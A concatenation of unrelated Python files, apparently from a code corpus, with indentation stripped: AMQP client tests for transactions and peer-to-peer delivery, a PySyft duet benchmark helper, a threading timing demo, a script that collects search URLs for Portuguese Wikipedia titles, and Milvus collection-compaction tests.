def test_message_reply_to(self):
""" skipped in transactional mode """
class TxLoggingOptionsTests(LoggingOptionsTests, TxSenderReceiverTestCase):
""" transactional logging options test group """
class TxConnectionOptionsTests(ConnectionOptionsTests, TxSenderReceiverTestCase):
""" transactional connection options test group """
class TransactionOptionsTests(TxSenderReceiverTestCase):
""" transactional options test group """
transactional = True
def test_sender_action_commit(self):
""" tests sender transaction commit """
send_opts = self.get_sender_opts()
send_opts.tx_action = 'commit'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_sender_action_rollback(self):
""" tests sender transaction rolback """
send_opts = self.get_sender_opts()
send_opts.tx_action = 'rollback'
self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 0)
def test_action_commit(self):
""" tests sender/receiver transaction commit """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.tx_action = 'commit'
recv_opts.tx_action = 'commit'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
# Connector tests
@unittest.skip("test class not implemented yet")
class ConnectorTests(ConnectorTestCase):
""" connector client test group """
def test_connect(self):
""" test connect using connector client """
conn_opts = self.get_connector_opts()
self.run_connector(conn_opts)
class CommandLineTests(CommandLineTestCase):
""" command line test group """
def setUp(self):
""" create connect.json """
f = open("connect.json", "w")
f.write('{"scheme": "amqp"}')
f.close()
def test_send_receive(self):
""" basic send receive test """
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv_messages = self.run_receiver(['--log-msgs', 'dict'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_subscribe(self):
""" basic subscription test """
recv = self.run_receiver(['--log-msgs', 'dict', '-c', '1', '--timeout', '1'], False)
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv.wait()
recv_messages = [l.strip() for l in recv.stdout]
recv.stdout.close()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_read_config_file_send_receive_cli(self):
""" basic send receive test with connection configuration file """
sent_messages = self.run_sender(['--log-msgs', 'dict', '--conn-use-config-file'])
recv_messages = self.run_receiver(['--log-msgs', 'dict', '--conn-use-config-file'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_conn_urls_send_receive_cli(self):
""" basic send receive test with connection urls """
sent_messages = self.run_sender([
'--broker-url', '127.0.0.1:5671/examples',
'--log-msgs', 'dict',
'--conn-urls', '127.0.0.1:5670,127.0.0.1:5672',
])
recv_messages = self.run_receiver([
'--broker-url', '127.0.0.1:5671/examples',
'--log-msgs', 'dict',
'--conn-urls', '127.0.0.1:5670,127.0.0.1:5672',
])
sent_messages = [m for m in sent_messages if m.startswith('{')]
recv_messages = [m for m in recv_messages if m.startswith('{')]
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_send_receive_on_release(self):
"""
tests basic send and receive of a message using 10 concurrent receivers
and enforces usage of '--on-release retry'
:return:
"""
# Total number of messages expected to be exchanged
TOTAL_MSGS = 100
# Number of concurrent receivers accepting messages
RECV_INSTANCES = 10
RECV_COUNT = TOTAL_MSGS/RECV_INSTANCES
receivers = list()
receiver_args = ['--action', 'release', '-b', '0.0.0.0:5673/examples',
'--log-msgs', 'dict', '-c', "%s" % int(RECV_COUNT),
'--timeout', '30']
# running one single receiver that will release all messages
recv_release = self.run_receiver(receiver_args, in_wait=False)
# multiple receivers that will accept all messages
for _ in range(RECV_INSTANCES):
recv = self.run_receiver(receiver_args[2:], in_wait=False)
receivers.append(recv)
# running sender and retrieving amount of messages sent
sent = self.run_sender(['-b', '0.0.0.0:5673/examples', '--log-msgs', 'dict',
'-c', "%s" % TOTAL_MSGS, '--timeout', '30', '--on-release', 'retry'])
sent_msgs = len(sent)
# counting received messages (accepted)
received_msgs = 0
for recv in receivers:
recv.wait()
received_msgs += len(recv.stdout.readlines())
recv.stdout.close()
# waiting on recv_release to complete
recv_release.wait()
released_msgs = len(recv_release.stdout.readlines())
recv_release.stdout.close()
# sender must have sent the total amount msgs plus number of released msgs
self.assertGreaterEqual(sent_msgs, TOTAL_MSGS + RECV_COUNT)
self.assertEqual(received_msgs, TOTAL_MSGS)
self.assertEqual(released_msgs, RECV_COUNT)
def tearDown(self):
""" delete connect.json """
os.remove("connect.json")
# Peer-to-peer tests
class P2PTests(P2PTestCase):
""" point-to-point test group """
def test_p2p_snd_rcv_threading(self):
""" tests point-to-point delivery """
recv_opts = self.get_receiver_opts()
recv_opts.count = 1
recv_thread = threading.Thread(target=self.run_receiver, args=[recv_opts])
recv_thread.start()
send_opts = self.get_sender_opts()
send_opts.conn_allowed_mechs = 'ANONYMOUS'
sent_messages = self.run_sender(send_opts)
recv_thread.join()
self.assertTrue(len(sent_messages) == len(self.recv_messages) == 1)
def test_p2p_snd_rcv_subprocess(self):
""" tests point-to-point delivery """
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
def test_p2p_snd_rcv_subprocess_sasl_enabled(self):
""" tests point-to-point delivery with enabled sasl"""
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict',
'--conn-sasl-enabled', 'true'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS',
'--conn-sasl-enabled', 'true'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
def test_p2p_snd_rcv_subprocess_sasl_disabled(self):
""" tests point-to-point delivery with disabled sasl"""
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict',
'--conn-sasl-enabled', 'false'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS',
'--conn-sasl-enabled', 'false'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
if __name__ == '__main__':
TRN = unittest.main(module=__name__, exit=False, verbosity=2)
sys.exit(not TRN.result.wasSuccessful())
|
benchmark_send_get_multiprocess_test.py
|
# stdlib
import socket
import time
from typing import Any
from typing import List
# syft absolute
from syft.lib.python import List as SyList
from syft.lib.python.string import String
# syft relative
from ...syft.grid.duet.process_test import SyftTestProcess
PORT = 21211
def do_send(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
_ = data.send(duet, pointable=True)
sy.core.common.event_loop.loop.run_forever()
def ds_get(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
for retry in range(10):
if len(duet.store) != 0:
break
time.sleep(0.1)
assert len(duet.store) != 0
remote = duet.store[0].get(request_block=True, delete_obj=False)
assert remote == data
def run_endpoints(do_runner: Any, ds_runner: Any, data: Any) -> None:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
do_proc = SyftTestProcess(target=do_runner, args=(data,))
do_proc.start()
ds_proc = SyftTestProcess(target=ds_runner, args=(data,))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hanged for {len(data)}")
def send_get_string_multiprocess(data: String) -> None:
run_endpoints(do_send, ds_get, String(data))
def send_get_list_multiprocess(data: List[str]) -> None:
run_endpoints(do_send, ds_get, SyList(data))
|
2_Manual_threading.py
|
# 2 Using Manual threading in python
# Import Threading & Time
import threading
import time
# Start counting
start = time.perf_counter()
# Create simple function that sleep in 1 second
def do_something():
print('Sleeping 1 second..')
time.sleep(1)
print('Done Sleeping..')
# Create threading, start and join
t1 = threading.Thread(target=do_something)
t2 = threading.Thread(target=do_something)
t1.start()
t2.start()
t1.join()
t2.join()
# Finish counting and show script runtime
finish = time.perf_counter()
print(f"Finished in {round(finish-start,2)} second(s)")
|
get_web_urls.py
|
from codecs import open
from googlesearch import search
import json
import threading, queue
'''
Input:
Extracted Wikimedia dump txt of articles titles and ids:
ptwiki-20210320-pages-articles-multistream-index.txt
Output: csv file with (article_id, article_title, [url1, ..., urln])
'''
def check_restrictions(url):
restrictions = ['.pdf', '.mp4', '.jpeg', '.jpg']# ['wikipedia.org', '.pdf', '.mp4', '.jpeg', '.jpg']
for restriction in restrictions:
if(restriction in url):
return False
return True
q_in = queue.Queue()
q_out = []
def worker():
while True:
article = q_in.get()
urls = search(article[1], lang="pt-br")#num_results = 15, lang="pt-br")
good_urls = []
query = ''
for url in urls:
if('/search?q=' in url):
query = url
elif (check_restrictions(url)):
good_urls.append(url)
q_out.append([article[0], article[1], good_urls, query])
q_in.task_done()
#print(f'Finished {item}')
def get_articles(file_path, out_path):
'''
already_done_articles = []
try:
with open(out_path, 'r') as file:
for line in file:
article = json.loads(line)
already_done_articles.append(article['id'])
except:
pass
'''
last_id = 0
try:
with open(out_path, 'r') as file:
for line in file:
article = json.loads(line)
if(int(article['id']) > last_id):
last_id = int(article['id'])
except:
pass
docs = []
print('Loading articles')
with open(input_path + input_file, 'r') as file:
for line in file:
#print('{}/{}'.format(i, 105695))
attrib = line.split(':')
article_id = attrib[1]
article_title = attrib[2].replace('\n', '')
if(int(article_id) > last_id):
if('(desambiguação)' not in article_title):
docs.append([article_id, article_title])
return docs
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def search_urls(wiki_articles, workers = 1, n=15):
global q_in, q_out
articles_and_urls = []
print('Searching urls:')
if(workers==1):
i = 1
for article in wiki_articles:
print('({}/{})'.format(i, len(wiki_articles)))
article_id = article[0]
article_title = article[1]
urls = search(article_title, num_results = n, lang="pt-br")
good_urls = []
query = ''
for url in urls:
if('/search?q=' in url):
query = url
elif (check_restrictions(url)):
good_urls.append(url)
#print('title: {} id: {} \n {} urls: {}'.format(article_title, article_id, len(good_urls), good_urls))
articles_and_urls.append([article_id, article_title, good_urls, query])
i = i + 1
elif(workers > 1):
for article in wiki_articles:
q_in.put(article)
# block until all tasks are done
q_in.join()
for article_and_urls in q_out:
articles_and_urls.append(article_and_urls)
q_out = []
return articles_and_urls
def store_articles_and_urls(articles_and_urls, output_path):
with open(output_path, 'ab+') as file:
for article in articles_and_urls:
doc = {'id' : article[0], 'title' : article[1], 'n_urls' : len(article[2]), 'urls' : article[2], 'query' : article[3]}
to_out = json.dumps(doc, ensure_ascii=False).encode('utf-8')+'\n'.encode('utf-8')
file.write(to_out)
def search_and_store_urls(wiki_articles, output_path, batch_size, workers = 1):
n_chunks = int(len(wiki_articles)/batch_size + 0.5)
i = 1
for batch in chunks(wiki_articles, batch_size):
print('batch {}/{}'.format(i, n_chunks))
articles_and_urls = search_urls(batch, workers)
store_articles_and_urls(articles_and_urls, output_path)
i = i + 1
if __name__ == '__main__':
input_path = 'dumps/index/'
input_file = 'ptwiki-20210320-pages-articles-multistream-index3.txt-p513713p1629224'
output_path = 'urls/'
output_file = 'p513713p1629224.json'
batch_size = 10
n_workers = 10
'''
ptwiki-20210320-pages-articles-multistream-index1.txt-p1p105695
ptwiki-20210320-pages-articles-multistream-index2.txt-p105696p513712
ptwiki-20210320-pages-articles-multistream-index3.txt-p513713p1629224
ptwiki-20210320-pages-articles-multistream-index4.txt-p1629225p2880804
ptwiki-20210320-pages-articles-multistream-index5.txt-p2880805p4380804
ptwiki-20210320-pages-articles-multistream-index5.txt-p4380805p5024908
ptwiki-20210320-pages-articles-multistream-index6.txt-p5024909p6524729
'''
articles = get_articles(input_path+input_file, output_path + output_file)
if(n_workers > 1):
for i in range(n_workers):
threading.Thread(target=worker, daemon=True).start()
search_and_store_urls(articles, output_path + output_file, batch_size, n_workers)
#store_articles_and_urls(articles_and_urls, output_path + output_file)
|
test_compaction.py
|
import threading
from time import time, sleep
import pytest
from pymilvus.grpc_gen.common_pb2 import SegmentState
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.util_log import test_log as log
prefix = "compact"
tmp_nb = 100
class TestCompactionParams(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
def test_compact_without_connection(self):
"""
target: test compact without connection
method: compact after remove connection
expected: raise exception
"""
# init collection with tmp_nb default data
collection_w = self.init_collection_general(prefix, nb=tmp_nb, insert_data=True)[0]
# remove connection and delete
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: "should create connect first"}
collection_w.compact(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_twice(self):
"""
target: test compact twice
method: 1.create with shard_num=1
2.insert and flush twice (two segments)
3.compact
4.insert new data
5.compact
expected: Merge into one segment
"""
# init collection with one shard, insert into two segments
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=tmp_nb)
# first compact two segments
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans1 = collection_w.get_compaction_plans()[0]
target_1 = c_plans1.plans[0].target
# insert new data
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
log.debug(collection_w.num_entities)
# second compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_state()
c_plans2 = collection_w.get_compaction_plans()[0]
assert target_1 in c_plans2.plans[0].sources
log.debug(c_plans2.plans[0].target)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_partition(self):
"""
target: test compact partition
method: compact partition
expected: Verify partition segments merged
"""
# create collection with shard_num=1, and create partition
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
partition_w = self.init_partition_wrap(collection_wrap=collection_w)
# insert flush twice
for i in range(2):
df = cf.gen_default_dataframe_data(tmp_nb)
partition_w.insert(df)
assert partition_w.num_entities == tmp_nb * (i + 1)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 1
assert len(c_plans.plans[0].sources) == 2
target = c_plans.plans[0].target
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert target == segment_info[0].segmentID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_only_growing_segment(self):
"""
target: test compact growing data
method: 1.insert into multi segments without flush
2.compact
expected: No compaction (compact just for sealed data)
"""
# create and insert without flush
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
# compact when only growing segment
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 0
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
for segment_info in segments_info:
assert segment_info.state == SegmentState.Growing
@pytest.mark.tags(CaseLabel.L2)
def test_compact_empty_collection(self):
"""
target: test compact an empty collection
method: compact an empty collection
expected: No exception
"""
# init collection and empty
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
# compact
collection_w.compact()
c_plans, _ = collection_w.get_compaction_plans()
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("delete_pos", [1, tmp_nb // 2])
def test_compact_after_delete(self, delete_pos):
"""
target: test delete one entity and compact
method: 1.create with shard_num=1
2.delete one sealed entity, half entities
2.compact
expected: Verify compact result
"""
# create, insert without flush
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete single entity, flush
single_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:delete_pos]}'
collection_w.delete(single_expr)
assert collection_w.num_entities == tmp_nb
# compact, get plan
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
# Delete type compaction just merge insert log and delta log of one segment
# todo assert len(c_plans.plans[0].sources) == 1
collection_w.load()
collection_w.query(single_expr, check_items=CheckTasks.check_query_empty)
res = df.iloc[-1:, :1].to_dict('records')
collection_w.query(f'{ct.default_int64_field_name} in {insert_res.primary_keys[-1:]}',
check_items={'exp_res': res})
@pytest.mark.xfail("Issue #15499")
@pytest.mark.tags(CaseLabel.L3)
def test_compact_after_delete_index(self):
"""
target: test compact after delete and create index
method: 1.create with 1 shard and insert nb entities (ensure can be index)
2.delete some entities and flush (ensure generate delta log)
3.create index
4.compact outside retentionDuration
5.load and search with travel time
expected: Empty search result
"""
# create, insert without flush
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
# delete and flush
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
# build index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# compact, get plan
sleep(50)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans[0].sources) == 1
collection_w.load()
res, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
# Travel time currently does not support travel back to retention ago, so just verify search is available.
assert len(res[0]) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_ratio(self):
"""
target: test delete entities reaches ratio and auto-compact
method: 1.create with shard_num=1
2.insert (compact load delta log, not from dmlChannel)
3.delete 20% of nb, flush
expected: Verify auto compaction, merge insert log and delta log
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete 20% entities
ratio_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:tmp_nb // ct.compact_delta_ratio_reciprocal]}'
collection_w.delete(ratio_expr)
assert collection_w.num_entities == tmp_nb
# auto_compact
sleep(1)
# Delete type compaction just merge insert log and delta log of one segment
# todo assert len(c_plans.plans[0].sources) == 1
collection_w.load()
collection_w.query(ratio_expr, check_items=CheckTasks.check_query_empty)
res = df.iloc[-1:, :1].to_dict('records')
collection_w.query(f'{ct.default_int64_field_name} in {insert_res.primary_keys[-1:]}',
check_items={'exp_res': res})
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delete_less_ratio(self):
"""
target: test delete entities less ratio and no compact
method: 1.create collection shard_num=1
2.insert without flush
3.delete 10% entities and flush
expected: Verify no compact (can't), delete successfully
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete 10% entities, ratio = 0.1
less_ratio_reciprocal = 10
ratio_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:tmp_nb // less_ratio_reciprocal]}'
collection_w.delete(ratio_expr)
assert collection_w.num_entities == tmp_nb
collection_w.load()
collection_w.query(ratio_expr, check_task=CheckTasks.check_query_empty)
@pytest.mark.tags(CaseLabel.L0)
def test_compact_after_delete_all(self):
"""
target: test delete all and compact
method: 1.create with shard_num=1
2.delete all sealed data
3.compact
expected: collection num_entities is close to 0
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
res, _ = collection_w.insert(df)
expr = f'{ct.default_int64_field_name} in {res.primary_keys}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
# currently no way to verify whether it is compact after delete,
# because the merge compact plan is generate first
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
log.debug(collection_w.num_entities)
collection_w.load()
collection_w.query(expr, check_items=CheckTasks.check_query_empty)
@pytest.mark.skip(reason="TODO")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delete_max_delete_size(self):
"""
target: test compact delta log reaches max delete size 10MiB
method: todo
expected: auto merge single segment
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_compact_max_time_interval(self):
"""
target: test auto compact with max interval 60s
method: 1.create with shard_num=1
2.insert flush twice (two segments)
3.wait max_compaction_interval (60s)
expected: Verify compaction results
"""
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
collection_w.compact()
# Notice:The merge segments compaction triggered by max_compaction_interval also needs to meet
# the compaction_segment_ num_threshold
for i in range(ct.compact_segment_num_threshold):
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb * (i + 1)
sleep(ct.max_compaction_interval + 1)
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segment_info) == 1
@pytest.mark.skip(reason="TODO")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delta_max_time_interval(self):
"""
target: test merge insert and delta log triggered by max_compaction_interval
method: todo
expected: auto merge
"""
pass
class TestCompactionOperation(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
def test_compact_both_delete_merge(self):
"""
target: test compact both delete and merge
method: 1.create collection with shard_num=1
2.insert data into two segments
3.delete and flush (new insert)
4.compact
5.load and search
expected:
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
ids = []
for i in range(2):
df = cf.gen_default_dataframe_data(tmp_nb, start=i * tmp_nb)
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == (i + 1) * tmp_nb
ids.extend(insert_res.primary_keys)
expr = f'{ct.default_int64_field_name} in {[0, 2 * tmp_nb - 1]}'
collection_w.delete(expr)
collection_w.insert(cf.gen_default_dataframe_data(1, start=2 * tmp_nb))
assert collection_w.num_entities == 2 * tmp_nb + 1
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
sleep(5)
ids.pop(0)
ids.pop(-1)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_items={"nq": ct.default_nq,
"ids": ids,
"limit": ct.default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_compact_after_index(self):
"""
target: test compact after create index
method: 1.insert data into two segments
2.create index
3.compact
4.search
expected: Verify segment info and index info
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# create index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_after_binary_index(self):
"""
target: test compact after create index
method: 1.insert binary data into two segments
2.create binary index
3.compact
4.search
expected: Verify segment info and index info
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1,
schema=cf.gen_default_binary_collection_schema())
for i in range(2):
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == (i + 1) * ct.default_nb
# create index
collection_w.create_index(ct.default_binary_vec_field_name, ct.default_binary_index)
log.debug(collection_w.index())
collection_w.load()
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
vectors = cf.gen_binary_vectors(ct.default_nq, ct.default_dim)[1]
search_res_one, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit)
assert len(search_res_one) == ct.default_nq
for hits in search_res_one:
assert len(hits) == ct.default_limit
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# verify index re-build and re-load
search_params = {"metric_type": "L1", "params": {"nprobe": 10}}
search_res_two, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Metric type of field index isn't "
"the same with search info"})
# verify search result
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
search_res_two, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit)
assert len(search_res_two) == ct.default_nq
for hits in search_res_two:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_index(self):
"""
target: test compact and create index
method: 1.insert data into two segments
2.compact
3.create index
4.load and search
expected: Verify search result and index info
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# create index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_and_search(self):
"""
target: test delete and compact segment, and search
method: 1.create collection and insert
2.delete part entities
3.compact
4.load and search
expected: Verify search result
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
collection_w.compact()
# search
sleep(2)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_task=CheckTasks.check_search_results,
check_items={"nq": ct.default_nq,
"ids": insert_res.primary_keys[ct.default_nb // 2:],
"limit": ct.default_limit}
)
@pytest.mark.tags(CaseLabel.L0)
def test_compact_merge_and_search(self):
"""
target: test compact and search
method: 1.insert data into two segments
2.compact
3.load and search
expected: Verify search result
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L2)
def test_compact_search_after_delete_channel(self):
"""
target: test search after compact, and queryNode get delete request from channel,
rather than compacted delta log
method: 1.insert, flush and load
2.delete half
3.compact
4.search
expected: No compact, compact get delta log from storage
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load()
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
collection_w.compact()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 0
# search
sleep(2)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_task=CheckTasks.check_search_results,
check_items={"nq": ct.default_nq,
"ids": insert_res.primary_keys[ct.default_nb // 2:],
"limit": ct.default_limit}
)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_inside_time_travel(self):
"""
target: test compact inside time_travel range
